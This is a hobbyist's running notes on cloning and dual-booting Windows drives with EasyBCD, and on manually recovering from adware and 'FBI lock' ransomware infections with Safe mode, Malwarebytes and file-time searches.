        But by doing a whole lot testing, a lot of boots of various combinations systematically, I have made some progress. When I opened the computer and disconnected power to the internal drive and plugged in the clone to an open sata connector on motherboard, the clone booted with its files and desktop. This confirms that it had been bootable during my failed USB booting tests.

    1) Two sata (or esata) drives --- Obviously with all drives on sata (or esata), both drive could be outside, or one inside and one outside, because the computer can't tell the difference.  The computer thinks it has two internal drives. If both are bootable and both outside, obviously one that goes bad could just be disconnected by pulling its cable.

        The tricky part was figuring if it was possible to mount them both inside a closed case and to switch between them. Yes it is, and I figured out two ways to do this. First way is switch the power of individual drives on/off with a back panel switches. Second was the proper way to set up a dual boot using boot editor/utility EasyBCD. This option allows the controlling drive (with its desktop and programs) to be selected at boot while the non-selected drive is still visiable as a data drive (f:\).

Internal sata clone drive with separate drive switched power
        My first success was to show that with both the internal and clone drive both connected to sata I could switch from one to the other just by switching their power connectors, i.e. powering just one at a time. I have bought (ebay) a rear panel bank of switches that will do just this for drives mounted internally. It is just a bank of four simple (very low Ron) fet switches controlled by pushbuttons. This provides one way that a clone hard drives could be mounted inside and work as a clone. Power both drives and do the cloning (only 20 min for 50 Gbytes over sata). Power off the clone so it is isolated. If the main hard drive goes down, switch off its power, and switch on the power to the clone.

Clone drive switched in via dual boot (EasyBCD)
        After systematically testing a bunch of boot sequence options, I found one that works! This is a nice option in that no hardware change is required to switch over to the clone drive or to do the cloning. You just select which of two internal bootable Windows drives internally you want ot be in control, i.e. to bring up its desktop and its programs as the c:\ drive. (A boot sequence option can be combined with power switches to take the clone off line to protect it from being overwritten.)

    3) One sata drive (internal) and one USB drive --- This is a common configuration. For weeks now one of my external USB drives is an internal style sata drive externally powered and connected to the USB port through a (dandy) sata-to-USB converter, and I have used this drive as a clone drive. I have EasyBCD setup to allow me to boot from this USB clone and Windows built-in msconfig.exe tells me that in fact it supplies the OS. However, even if I am booting from the external USB drive I find the internal sata drive disktop and programs always (to date) show up as the c:\ drive with the clone drive files and programa on f:\.

        Since I did these USB tests, I have learned more about how the boot sequence works, so it might be possible to get the USB drive to control with the internal sata drive as an f:\ data drive, but I wouldn't bet on it. I might go back and do more tests.

    4)  One USB (bootable) drive, no internal sata drive --- A key question is does this option work. I suspect it does, but have yet to pull my internal sata cable to check it. It is amazing that in all my online research, I have not seen a single detailed discussion of this option.

Externally power an internal drive
       One cool idea just occurred to me. What the safest easiest way to disable the internal drive physically, if this is necessary to allow a USB clone to take over, which at this point it seems to be. Just power it externally with a widely available PS brick (+5, +12V @ 2A), one of which I already have. Just remove a bracket in back and use a long power expander cable to connect it up to the brick. There are some issues with what do do about power to the drive when the computer is off, but from a data signal integrity point of view it is clean. [1 Tbyte Seagate clone on sata spins down when drive is off] Another option, simple but somewhat cludgy option, is power the internal drive though two expansion power cables that plug together with the connection between them just hanging outside the computer through a hole made by removing a bracket. (Might have a minor effect on fan airflow inside case.) I later found the bracket power switches, which do the same thing, but are a lot cleaner.

        My first round of boot tests was a failure. I tried all combinations of boot menu (Esc) and EasyBCD options and every combination that booted (some didn't boot) brought up the desktop and programs of the internal drive with the clone drive visible too, its c:\ drive showing up as the f:\ drive. But in a second round of boot tests I found a combination that works. This combination used EasyBCD set up differently and changed the boot sequence not with Esc (boot menu), but by one time going into Bios (via F10 Setup) and changing the drive boot sequence.

        With EasyBCD installed the boot sequence is very complicated. There are three separate ways to change the boot seqence all in some sort of cascade where it is not clear which overrides which, plus several ways to set up EasyBCD. At first totally confusing, but with a lot of testing and some reading I have at least some grasp of what is happening.

Bios sequence options
        Lets start with the bios. In my HP machine there are two separate way at boot to change the drive sequence! Why? Who knows, but my guess is that the simple 'boot menu' (Esc) option was added to make it easy to make a temporary (one time) change to the boot sequence. The Esc key at boot just brings up a list of boot devices the bios sees and allows you scroll down and select one to boot from. The other bios sequence option is the classic bios menu choices, including boot, accessed in my HP computer by choosing 'setup' (F10) at boot. Here you can go in and change the priority order of the hard drives, which is saved into CMOS memory so its permanent until a new choice is resaved.

        Priority? I had assumed, because it was the only thing that made any sense to me, that if the Esc (boot menu) option is entered that its sequence would override the CMOS bios sequence. However, now I am not so sure, since it was only when I made a change to the CMOS drive sequence was I able to get my dual boot sequence to work.

        When trying to set up a dual boot, what is so confusing with sata drives at first is that there appear to be no way to specify a particular drive. Unlike IDE hard drives, which use jumpers to set a master and slave, with sata drives there is no hardware setting for master or slave. It makes installing the drives easier, but then how the boot system or OS know which drive to select?

        One thing I figured out is that the sata connectors on the motherboard are numbered #1 to #6. These sata connector numbers show in the bios as a list of devices plugged into sata 1 to sata 6. Each entry in the list showing the manuf part number of the drive or DVD player plugged into that connector. The sata connectors on my motherboard are also different colors. Detailed online HP documentation for my computer does not identify the numbering of the sata connectors. The bios indicates that HP at manuf plugged my computer's single hard drive into sata 1 and the DVD player is plugged into sata 2. (DVD group normally has priority over the drive group.) As I moved my clone drive sata cable from free connector to another, I could see the move in bios and from this figure out the number of the motherboard connector.

         I now suspect the motherboard sata connectors form a default drive boot sequence. Of course, the drive boot sequence (by manuf part numbers) can be changed in boot CMOS memory, so there is no hard requirement on connectors to use for a particular boot sequence.

EasyBCD dual boot program
        This is a nice program, free, and from what I read the standard way to set up a dual boot. Once you figure it out, it makes control of boot easy with lots of useful boot tools. I plan to continue to use it to control my dual boot two drive system.

        Initially this program was intimidating, a total black box, probably some sort of low level boot control that I had no interest (or hope) in fathoming how it worked. I never found any sample EasyBCD dual boot setups, which would have been very helpful, so I resorted to trial and error. From reading about dual drive setups I began to suspect that EasyBCD was really at heart sort of a Windows editor for boot, just an easy way to set boot parameters that can be set manually (with great effort) in Windows. Msconfig has a boot section that allows some boot options to be set (like a time out for default), but other boot configurations choices,  name of drives, ID of drives, requires tricky command line queries and setups. 'BCD' is where the boot info is stored in the boot section of the drive and the program EasyBCD just makes it easy to set this up. Hence the name!

        The heart of my confusion in setting up EasyBCD is how to have an option select a particular drive. The EasyBCD setup shows a drive letter for the boot program, like c:\ or f:\, but what does this mean. In each of my desired options the boot file will come from its c:\ drive and the boot program on the other drive will be at f:\. So how to I get the drives to change places. Not at all clear. I still don't fully understand it, but I like it and plan to continue to use it to control my dual drives.

Reading EasyBCD documentation
        Only after a lot of trial and error testing, and finally getting dual boot to work, did I dig into EasyBCD documentation on how to set up a dual boot. It's hard to find, but the procedure works. When I deleted by earlier settings and did it their way I was able to change the drive boot order in the bios and the dual boot still worked. There's a little trick to setting the entries for a dual boot, which is not that easy to find in its documentation. Here's the key instruction:

** Adding a Windows Vista/7/8 Entry
        3) "Select the letter of the drive/partition Windows is installed on from the drop-down menu (e.g. “c:”). It’s important to note that the Drive Letter must be the one currently visible in My Computer that points to the drive that Vista/7 is installed on. Even if the drive letters change from install to install, use the drive letters as they appear in your current boot. EasyBCD will automatically convert them to the proper drive and partition numbers that can be understood by the Windows bootloader."

Translation  --- When I booted from my main (750 Gbyte) internal drive, the files and programs on this drive are my c:\ drive and the files and programs of the 1Tbyte clone drive are the f:\ drive. Here's what the EasyBCD instructions above mean in my case. Starting with zero entries add an entry, call it say the 'c drive', and assign it letter c:\. Then add a second entry, call it 'f drive', and assign it letter f:\. That's it, if both drives are bootable you have a dual boot!

        The names entered will appear as menu choices during a pause in boot. 'c drive' should select a boot from one drive and 'f drive' the other. Now check out which name goes with which drive, open EasyBCD and rename the choices with the names of the drives. There's no need to figure out the drive ID numbers. If the Windows files of the other drive currently show in the directory as say the f:\ drive, you only need to select f:\ from the pull down menu. EasyBCD will figure out the details of how to identify each drive for the bootloader.

        Note EasyBCD says it can also easily make a drive bootable. This looks interesting, however, I didn't use it or play around with it, because my clone software (Casper) had already made my clone drive bootable.

Collision signature
        One of the needlessly horribly confusing things about Windows with multiple hard drives is 'collision signature'. If two drives have the same ID (signature) in their boot sector, Windows can't tell them apart, so one just disappears. I read poster after poster wailing about this. I first ran into this myself a couple of years ago when I bought a second 2 Tbyte WD USB drive of the same exact model I had. I found only one would work at a time, when I plugged both in, one dropped out. This is freaking ridiculous! WD even though aware of this includes no warning, no help, so I was not kind about this in my Amazon review of the drive. The 'fix' took hours to figure out. It was suggested in a WD forum that plugging the drive into a different computer might help, something about the new computer changing the signature. Why or how this would do anything, I don't have a clue, but in fact it worked. I plugged my new 2 Tbyte USB drive into the USB port of my old Vista portable for a few minutes, and it then worked OK, and has continued to work OK, in Windows 7. Isn't this freaking ridiculous? It seems to imply that a computer is writing to the boot drive of a data (non-bootable) USB drive, which seems very odd. At this point how the signature works is just a big mystery. I see little written about this online.

        So the obvious question is doesn't a clone have the same ID as the main drive? Or do the clone software packages change it? I need to research this at the clone houses, but to date have seen nothing on this anywhere. Some combinations give me no boot. Is collision signature the reason? How do you change the ID signature anyway. I know there is a command line way to do and even tried it. Is this what fixed my problem? Possibly.

        EasyBCD looks like a useful boot tool, which I have only dipped my toe into. It has of bootloader tools worth exploring and documentation worth reading.

EasyBCD settings for a working dual boot
       Here are photos of EasyBCD setting for a dual boot (that works!) with the main and clone drive plugged into sata connectors on the motherboard. First photo is after booting Windows from the 750 Gbyte internal drive. The second photo is after booting Windows from the 1 Tbyte clone drive. I added the drive size in the name of c drive icons (left, center) so I can tell at a glance which drive is in control.

        I am going to keep the capacity of the clone drive larger than the main drive as it is above. While bios boot options identify drives by their manuf model numbers, the Windows disk configuration screen shows only disk capacity and partitions. However, drive manuf and model # can be obtained by right right clicking disk #, properties. Selecting a larger capacity drive to use as a clone drive makes it easy to identify the clone drive on the disk configuration screen. Going forward it's important that the main drive and clone drive not get mixed up, else stuff will get lost.

        I first thought if I added a 2nd clone drive, I should choose a 3rd capacity, but now that I see that I can get the manuf and model # from the disk configuration screen, maybe it's OK if  two clones are similar. Haven't given much thought as to how to tell two clones apart.

Trick?
        [Update, The paragraph below explains how I first got the dual boot working, but I later found the bios drive boot sequence is not important. EasyBCD can set up the dual boot to work with either drive set first in the bios boot order.]

        The trick, or more accurately the change that I made, that got me to a sequence that worked was this: I changed the CMOS drive order putting the clone first. Did it matter that this is opposite the motherboard connector number sequence? Don't know. Important that it is different (if it is) from EasyBCD default? Don't know. Anyway for some reason with this change to the CMOS bios drive sequence I could now select either drive. To do this I added on entry with name c drive and letter c:\, the second entry with name f drive and letter f:\. When I later learned which drive each selected, I went back and put in more descriptive names in EasyBCD, because these are the name that show on the boot selection screen.

USB boot test (4/11/14)
        With the dual boot working fine with both drive connected to the motherboard sata connectors I wondered what would happen if I again tried the clone drive on USB. All I had to do was unplug the clone's data cable from the motherboard sata connector and plug it into the sata-to-USB converter. Well it didn't work, and something interesting happened. Up popped screens saying a new drive had been detected, but it had to be formatted. In the disk configuration screen there the clone drive was, but it was shown as RAW with no partitions.

        It looks like a drive set up on sata cannot simply be moved to USB. Its partitions are not visible, so nothing on the drive is visible. It has to be reformatted while attached as a USB drive. I remember the same thing happened when I moved the clone drive from USB to sata, I got the same popup screens telling me the new drive needed to be formatted.

        I wrote this up today in an Amazon pre-review of the enclosure I am buying that has both a USB 3 and esata port. It's logical to think you can just try both a USB cable and an esata cable and use the one that's fastest, but unless USB 3 acts differently from USB 2, it's not that simple. Each time you switch the cable, at least with a bootable drive, all the data will be wiped clean from the drive because it needs to be formatted for the serial link that it is on.

        And of course, there is the not so minor matter than I have not yet figured out how, after mucho hours of work, how to get a dual boot setup to work with one drive on sata and one on USB.

Bootloader is changed
        Moving the clone drive from sata to USB and back to sata showed something interesting that bears on the signature collision issue. I didn't format the clone drive while on USB or do anything with it there except look at how it showed up on the disk configuration screen. I was very surprised when I hooked it back up to motherboard sata, exactly like before, that my two EasyBCD menu choices of my working dual boot were gone and four different (default) option choices had appeared with four different drive letters, and all of which booted to the same drive. Yikes. It looks like just hooking up a drive to a new machine (or link) can change its boot loader. This probably explains why plugging a drive into a different computer can cure a drive collision problem.

        There was no permanent harm done. After I deleted these four entries and added the two entries per EasyBCD documentation, my dual boot started working again and all the data on the drive was OK.

        I read the best low level repair tools are available from the disk manufacturers. Find out who makes the sick internal drive and go to that manufacturer for downloadable tools. Seagate has two, one for Windows, which can only do analysis, but (importantly) not repair. The DOS repair tool can 'repair' bad sectors, though I am not sure what 'repair' actually means, and removes bad sectors. DOS tools must be run from a bootable DVD. This allows the program to load and run from ram without the internal disk being used. In this was the ram program has free access to the disk and can modify any sector.

        There's a complication with DOS tools run from a bootable DVD, which is of course making the DVD! Seagate provides an .iso file (raw DVD image) that can be downloaded, and which then must be burned to a writable (DVD+R) disk. I have done this, but don't have a clean procedure for it. I used PowerISO, which I had used earlier to burn a Microsoft .iso file of Windows 7 to do a repair install (which failed). It's free and makes the DVD quickly, but it downloads a bunch of crap (PureLeads) which totall screwed up my browser. Avoid PowerISO. Seagate claimed Windows 7 had native capability to burn the .iso image, but I tried this and it didn't work. It just copied the .iso image to the disk, but to burn an .iso file and made a functioning disk it must first be expanded to show the files, which the Windows burn didn't do.

        Here's is the best procedure to get the best possible image and/or clone. Before you run image or clone programs you first want to get rid of, and repair if possible, as many bad blocks as possible. This is critical, not only will it give you the best quality image/clone, without it you may not get any image/clone at all. A lot of the image/copy programs will just fail and exit when they run into a bad block they can't read. It takes hours to do this, so run overnight. It may be necessary to keep running the repair tool when more bad blocks show up, which I found happened to me within hours.

    1) First (overnight) run a DOS tool from the disk manufacturer, chosing the long scan that can 'repair' and remove bad blocks. The Seagate DOS tool runs for hours to scan the whole disk and find bad sectors. At the end it shows the bad blocks it found and gives you the choice as to whether or not to repair them. The last 'repair' step is fast, just a few minutes.

    2) Run image software, maybe running those programs most senitive to bad blocks first. I find these are Windows image and Casper image.

    3) Run image/clone software that is less sensitive to bad blocks. I find these are Micrium image and Casper clone. Casper clone is nice in that if it can't read a block, not only will it keep going, it will tell you in its report (see Exceptions) which file(s) contain the bad blocks. This is the only tool I have which tells you which files are affected by bad blocks. Obviously this is very valuable information! In one case I found the only file affected was some unimportant thumbnail cache that Explorer keeps to speed up directories and can just be deleted, as it will be rebuilt. In the second case it was some Opera file in the user directory (purpose unknown). If this bad block turned out to create a problem, obviously the fix is easy, just to reinstall (and resetup) this one program.

=========================================================================================================
=========================================================================================================
More virus type annoying software
        Trying to get rid of yield.manager popup I downloaded several new anti-malware programs and even though I was careful this has led to new corruption. One way these new programs get installed is by the installer programs for the 'free' (anti-malware) program you are downloading. If offered I always choose custom installation, and unclick the addon programs the installers brings along. Another suspect is the supposed anti-malware AdAware I down loaded and a few days later uninstalled. (It was the second most downloaded anti-malware on CNET, after Malwarebytes, but I don't trust it given its aggressive nature, and problems like regedit.exe stopped working just after uninstalling it. (I saw one user blame his not working 'regedit' on AdAware)

Softonic
        Another bunch of aggressive annoying downloads have come from Softonic (http://grabit.en.softonic.com). This has not affected me much, but only because the browsers that it attacks I don't use much. On at least two browser (Mozilla, Chrome) it had installed a locking toolbar called:

                        IB Updater toolbar
                       Incredibar toolbar                          http://mystart.incredibar.com
                        MyStart toolbar ?

        Mozilla on its own identified this IB Updater toolbar as nasty, bringing up a set of user feedbacks about it, and offered to block it. Mozilla says it has been universally "side-installed" by a 3rd party. Anti-malware HitmanPro also identified Softronic as trouble. Softronics is thought to download a bunch of troublesome stuff. Google search shows Incredibar toolbar as a virus. According to one poster whenever he opens a new tab Incredibar goes to the web and calls a page to download.

AdAware to blame?
       Based on timing and its agressive nature I suspect AdAware (supposedly anti-malware) which I downloaded to fight yieldmanger (useless) my be the cause of this. I uninstalled AdAware after a few days as I did not like its aggressive nature, acting more like malware than anti-malware. It was just after I uninstalled it that I found the Windows 7 registry utility (regeit.exe) would no longer run. So I suspect AdAware here too.

        A search for 'Softonic' turned up several entries which I deleted. One was an addon for KMPlayer, my main video player. (I have not seen any change in KMPlayer's operation.)

---------------------------------------
(earlier notes)

Flash cookies
        What I discovered was this file was in a folder (first below) buried about ten layers deep that specified setting ('settings.sol') associated with 'Macromedia\Flash player'. A similiar list of dubious 'flash cookies' is also to be found in the second folder.

        c:\users\window_7\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\
        c:\users\window_7\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\LAD342JP\

        In the first directory I could see from the filenames, some trustworthy like Vanguard, other much less trustworth, that what look like 'Flash cookies' are being deposited. Each directory held only one file named 'settings.sol' I deleted all the directories under 'sys'. And so far my popup flash adds are gone. Later I found in the 2nd folder a similar list of dubious sites most of which in the form of xxxxx.com. I cleaned out this directory too. 100 sites had dropped 'flash cookies' here. A quick test shows a flash video plays OK, and I can see it writes into these directories, so cleaning out these directories looks like a history cleaning.  My popups are still gone. This looks like a fix.

        With hindsight I probably made a mistake. There must be an underlying trojan program downloading the ads. I should have looked at the settings filetime, and used its filetime to try and find the program calling the ads. Wait there is one file still in this directory with dated a couple of hour ago, maybe the last the ad popped up. I did a file search around its time window and bingo. I find a very suspecious pair of programs in

          c:\windows\prefetch\AgGIUAD_(long random number)

------------------------------
(This stuff is OK: Ready Boot, Trace, agGIRAD are part of an Microsoft boot speedup that is adaptive. It traces what is usually called, then prefetches it to speed things up. The good news is I suspect deleting this stuff did not cause any real harm.)

        A check of the directory 'c:\windows\prefetch' includes dozens of programs, many written in the last two days, a few of which look OK, but many are difficult to decipher. I suspect they all can be deleted. Even more suspicious I find a (single) subdirectory

        c:\windows\prefetch\ReadyBoot

        ReadyBoot contains only files all named 'Trace' (Trace6, Trace7, etc) installed within the last two days. Talk about suspicious! I am deleting the ReadyBoot subdirectory, and the two 'AgGIUAD' files, but I suspect all the files in c:\windows\prefetch\ can probably go as I don't thing prefetching any file is very important. I also plan to do a registry search for 'AgGIUAD'. It came up empty.
------------------------
CCleaner to the rescue
        I wondered, Does 'CCleaner' clean out the Flash folders folders? The answer is it doesn't by default, but it can! Just click the Adobe Flash Player (under Multimedia). It also has an option to delete 'old prefetch data', so I clicked that too. Looks like CCleaner may be a simple way to clean out Flash popup adds. Next time try it.

Notes on popup add war
        Cleaning efforts get rid of adds for a few hours, but they come back. Sometimes I find the same file fragments as I deleted.

        While something on my machine is calling these popups, I have not been able to find it. Another way to fight these popups that I see recommended is to have your browser block the sites from which the popups come. Obviously this is less desirable than getting at the root, the program calling them, and I see they have several different sources.

        A google search shows 'yieldmanager.net' is a cookie tracker and is associated with popups. Sure enought I find it in the cookie list of my browser Opera.

Reference for getting rid of ad.yieldmanager
       This looks good.
http://www.zomocainc.com/2007/07/13/how-to-remove-adyieldmanagercom-popup-spyware/

New York Times article about FBI lock virus (12/5/12)
        Reports it is hitting US big time with 16 different gangs in Russia doing this. Nearly zero useful info on recover. (No mention of Malwarebytes Anti-Malware) They do say if you pay the crooks rarely unclock your machine. Also they say while your computer is unlocked the crooks can explore it and steal stuff.

http://www.nytimes.com/2012/12/06/technology/ransomware-is-expanding-in-the-united-states.html?ref=todayspaper&_r=0
=================================================================================================

Introduction
       This virus is horrible. I have been hit by this thing about ten times in recent months. A recent article in the New York Times about 'ransom ware' (mentioning the FBI Lock virus) said this threat has become much more common with 16 gangs working on extorning money this way. I read that if you just click the 'wrong' link and your computer is hijacked, that there is no action you can take to prevent from being infected, that you don't have to open or run anything to be infected. Well maybe, but after being attacked so many times I think I can be a little more specific. I strong suspect that the attack is triggered by clicking on a video to run it. The video is either infected or maybe the video screen and start arrow are just fakes on a fake screen and the 'run' click initiates a download. Maybe it's a bug in flash that is being exploited, don't really know. But being careful about running videos on dodgy sites might give a modicum of protection.

        Why the authorities cannot shut down the criminals running this scam, I don't know. I mean they ask you to send them money! How hard can it be to find them? (Or are they in lawless Russia?)

       I have been hit so many times that I am quite an expert in how it acts and getting pretty good at recovery. I have all the recovery tools I need on my computer and can now recover and clean up my files in about 30 minutes. Every attack is a little different. The opening screens are different, the location and names of the virus files move around a little. One time the attack came with an MP3 file, so not only was my computer locked, but a voice kept repeating "your computer is locked". I don't have a webcam on my desktop, but I read that it often freaks out those being attacked by it starting the webcam and showing the user face on the screen.

** New variant of FBI Lock virus disables Safe mode recovery details (update 12/24/12)
        After recovering so many times over the last few months from the FBI lock virus, I knew it very well, but today I got attacked by a more advanced and nastier variant that also disables Safe mode, so there is no easy way to regain control. I finally recovered, but it was MUCH more difficult and took a long time. The virus writing gangs have addressed both of the weaknesses of the virus that I had identified.

        One, you can no longer regain control by booting into Safe mode! When I tried this, safe mode started to load files normally, but I ended up with just a blank white screen. Even Ctrl-Alt-Del access to Task Manager was blocked (it just flashes and disappears.). No access to Safe mode makes recovery much more difficult. The only approach left (that I know) is to boot from recovery disks. Luckily not only had I recently bought a set from HP, but just today I made my own recovery DVD. If you don't have recovery disks, I know of no way to recovering without changing the hard drive! (Maybe running anti-malware from flash drive?)

        I put in the recovery DVD I had just made and (pressing any keyboard key) booted into it. It worked and brought up a bunch of tools. One possible fix that I did not try was System Restore. I had two restore points made in last two days (still there). I had also made a disk image today, but this was painfully slow, several hours copying 250 Gbytes to a USB hard drive.

        Here is the long series of steps I went through that eventually allowed be to delete the virus and recover. (Obviously I have no way of knowing if all these steps are necessary.) The last two steps detail the files I found for this virus variant and when they downloaded.

            -- Startup Repair tool  ---- reported no boot errors
            -- Command prompt tool --- try to run System File Checker [sfc.exe /scannow]. Won't run as it says boot repair has
                                            a restart pending
            -- Reboot (F8) into 'Safe mode with Command prompt' --- Works, I get a command prompt.
                                            Run System File Checker (10 min), then exit. This brings up Safe mode, better but still damaged.
                                            Safe mode now has black screen with Safe in four corners, but now Ctrl-Alt-Del works and gets
                                            me to Task Manager. From there (file, run, browse) allows me navigate in Explorer
                                            so I can run Malwarebytes or (Mythicsoft) Agent Ransack.
            -- Run Agent Ransack in Safe mode --- Do a file search around the time of the lockup. I see Malwarebytes log write
                                            and at same exact time two 124 kbyte .tmp files written (8240.tmp and 8241.tmp), but (unlike every
                                            previous attack) I find no '.exe' file in the few minutes preceding the lockup. Big problem, the
                                            main virus .exe file is not found!
            -- Still in Safe mode I open Malwarebytes log in Notepad. It has three trojan entries (and a few in recycle bin). Two
                                            are the .tmp files I noted above (8240.tmp and 8241.tmp) at the same time as the log is written.
                                            But the log contains another trojan entry about 19 minutes earlier (FCBC.tmp) also a tmp file.
            -- Run Agent Ransack again in Safe mode --- This time with the search centered around the 19 minute earlier time noted
                                            in the Malwarebytes log. Bingo! Eight seconds before the log entry is what looks like the virus .exe file
                                            (xaARWGa.exe, 121 kbytes), and at the exact time of the log entry for FCBC.tmp trojan a suspicious
                                            file (uwjgotw.zpf, 186 kbytes). There are also at these times a bunch of picture files (.jpg and .png)
                                            with an .htm file (main.htm) that together very likely are the phony FBI screen.

        Deleted all the suspect files around these two times (19 minutes apart), and I had recovered. A scan by Malwarebytes came up clean except for a registry entry. This long process took nearly two hours. Googling 'xaARWGa.exe' I find only one entry for it on a malware site: it had shown up first time a month ago in UK, was unsigned, but it was not known if it was dangerous. (I bet it is!)

Summary
        I booted with Windows recovery disks and ran one of its tools: Startup repair. I found I could then boot (F8) into 'Safe mode with command prompt', where I ran System File Checker. After this, I found Ctrl-Alt-Del interrupt was now working (it had been previously disabled by the virus), so I could get to Task Manager and from there to Explorer with the ability to run anti-malware tools. Next time I would try the following shortcut:

        Try booting (F8) directly into 'Safe mode with command prompt'. It's possible that the virus doesn't block this mode. If this works, then see if Ctrl-Alt-Del will get you to Task Manager, or type 'exit' and then try Ctrl-Alt-Del. If these shortcuts don't work, then the recovery tools (Startup Repair and/or System File Checker) must be doing some good and helping with the recovery.

        Second flaw is that after your machine locks you can regain control by booting up in Safe Mode (tap F8 while booting).

        Third flaw is that (free) anti-malware can usually find and kill this virus. Run it in Safe mode. I use the highly regarded free version of Malwarebytes Anti-Malware. Every time, but one, it detected the virus and offered to kill it. In my experience it doesn't always find all the virus files, so a manual search for files downloaded at the same time will sometimes pick up other virus fragments like shortcuts and prefetches.

Attack and recovery
         The sign an attack has begun is without warning the (fake) 'FBI logo warning screen' suddenly pops up covering the whole screen, and in 1 or 2 seconds your computer really is locked up, keyboard and mouse don't work and even the interrupt Ctrl-Alt-Del is disabled. Your only option is to power down. The best thing to do is to immediately power down by holding the power switch, and to later find the virus files take note of the time. While not essential, it's good to wait a few minutes before powering up again. The reason for the wait is make a gap in file times, so you can easily separate files written by boot from those written around the time of the infection.

        When you click an infected link, the virus files quickly load and once loaded immediately lock the machine. This means that all the virus files will have filetimes very close together, usually the same to the second. Window's Explorer only shows file times to the minue, but Windows internally tracks time to higher resolution. I use and recommend the free search below: Agent Ransack from Myhicsoft

         http://www.mythicsoft.com/page.aspx?type=agentransack&page=home

        It shows file times to the second and can do file searchs for files written in a narrow time window making it relatively easy to find all the virus files. Typically there are 4-6 virus files usually written at exactly the same time (to the second). A common pattern is to see two or three .exe files writen at the exactly the same time (to the second) to different locations and with different names. The key that this is the virus writing multiple copies of itself to your hard drive is that all the files are the same size. (roughly 100 kbytes).

        I learned the hard way it is not enough to just delete one of the virus .exe files (say those in c:\user). If you don't get rid of all copies of the virus key (.exe) files, you will find the computer instantly relocks when you reboot. So the key to recovery is to find the exact file time, typically a 1-3 second window, and delete pretty much all the files (first) written your hard drive in this window. Even in such a tight time window I might find a dozen to two dozen files (applications write temporary files all the time), but loss of tmp files does no harm and with such a tight time window it is unlikely that by mistake a key system or application file will get deleted.

        When the computer locks up, I power down and note the time. By waiting a few minutes before rebooting I know the virus files are somewhere in the 100 or so files written in the last minute. If I can find just one virus file, then I know I can find the rest of them because they will the same, or almost the same, file time. If a malware scan finds a target or two, I don't let the malware quarantine, instead I note the location and find it with my Agent Ransack search utility to find its exact file time.

        While malware makes recovery easier, it can be done manually. I just did it on my last attack. Sort the files of the last minute by type and locate the few .exe files ('application' files). Some of the virus files are in this group. See the same size .exe file written at the exact same time to two locations?  Very suspicious. These are probably virus files, note the time. See an .exe file whose name appears to be a long random string of letters or numbers? Very suspicious. Good chance this is a virus file, note its time.

        Before deleting the (random).exe virus file, typically 96k to 116k, note the filename(s), because there may be a registry value pointing to this file that also needs to be cleaned out. Not sure how vital deleting the registry value is, but I suspect that if it remains and points to a non-existent file, it's just an annoyance at startup and can be cleaned up later.

MalwareBytes Anti-Malware
        The free program I use to find the virus files is the widely recommended 'MalwareBytes Anti-Malware', and it has identified some (generally two) of the virus files almost every time, however, it failed once to find anything. Another free program that I read will find the FBI lock virus files is 'HitmanPro Cloud Antimalware'. The only time I tried HitmanPro is when MalwareBytes failed to find the virus, and it failed too. MalwareBytes Anti-Malware doing a quick scan (3 min) under Safe mode has always in my experience reliably found two of the virus files (without a lot of false hits). It offers to delete these files, and for many this may be all that is necessary to recover, but I want to go further and remove all traces of the virus.

(Update Nov 16, 2012)
        'MalwareBytes Anti-Malware' has been on my computer for a couple of months. Twice during this time it has popped up a window saying it has blocked a virus attack giving the file name and asking if I wanted it killed, to which I say yes. From the filename this virus that it catches 'in the act' and kills does not appear to be the FBI lock virus. As far as I can tell MalwareBytes has never stopped an FBI lock virus attack, it just helps with cleanup running in Safe mode.

        In a recent FBI lock virus attack I did not run MalwareBytes. I decided to see if I could recover manually, which I did successfully. In looking through the files at the time of the attack I noticed something curious. At the very second of the attack some change was made in a folder labeled as a 'MalwareBytes log'. I can think of two possible explanations. One is that the virus writers are now attacking trying to disable MalwareBytes, or two, and probably more likely, MalwareBytes detected the virus attack when it occurred noting the virus filename and location for identification after the fact. Pretty sure the latter is correct. Looking more at Malwarebyte logs I see it often has logged trojans as they were downloaded with the notation "Allow".

Virus hides as Task Scheduler
       In my recent attack before running MalwareBytes I had already located the two virus .exe files (almost for sure two copies of the same file, same size (116k) and written at exact same time, even though as is common different file names). When I ran MalwareBytes it only found one trojan, this was the copy of the virus .exe file with a long random name. The other virus .exe copy, which MalwareBytes had missed, had a system sounding name (TaskScheduler.exe), and the virus had placed at the same time a 1k shortcut file in Windows Startup folder to call it (taskscheduler.lnk). I bet that if I had depended this time only on a Malwarebyte's quaranteen, I would have still been locked up on reboot, because I found out the hard way earlier that one remaining .exe virus file is all it takes.

Malware fail (Nov 10, 2012)
        On another attack today of the FBI lock virus both of my anti-malware programs (see above) failed to detect the virus. Maybe the virus is getting smarter. The good news is I was able to recover manually using my procedure and the great search program 'Agent Ransack', which can search files in a tight time window and shows file times to the second.  However, it took me three tries and about two hours.

        The reason it took three tries was I did too narrow a search the first two times. The first time I stupidly searched just c:\user folder (saving just a few minutes), where I know from past experience virus files are always found. What I forgot is that the virus puts copies of the key files in several locations outside c:\user). When I rebooted the supposedly clean machine, it locked up almost instantly (1-2 seconds after the desktop appeared). On my second cleaning I widened the search to the whole c:\ drive, but set the search time window (only) around the time of the second attack. Big mistake, it means I missed files that were time stamped with the time of the first attack, so again on boot up with the virus files still on the machine from the original attack, the machine locked up again.

Manual cleaning succeeds (Nov 10, 2012)
       Finally recovery effort #3 succeeded. When I started cleaning #3, I didn't understand the virus files from the original attack a couple of hours earlier were still on the machine, but I remembered there was often a virus file in a 'prefetch' directory, so I thought that maybe this was calling a new copy of the virus at power up. To prevent this I powered down my cable modem before repowering my machine (with hindsight I doubt this was necessary). This time when I started cleaning (searching c:\), I looked at the 'prefetch' folder, and there was a file with the time stamp of the original attack (two hours earlier). I now realized my error, that I had missed virus files in the my first two cleanings and  that I needed to a search of c:\ with centered on the time of the original attack, and sure enough I found a bunch of virus files.

        I found virus files in these folders:
                  c:\user                                                   (various subdirectories)
                  c:\windows\prefetch
                  c:\windows
                  c:\programdata                                      (registry value pointed to virus .exe files in this folder)
                  registry value (search using filename of virus .exe file)

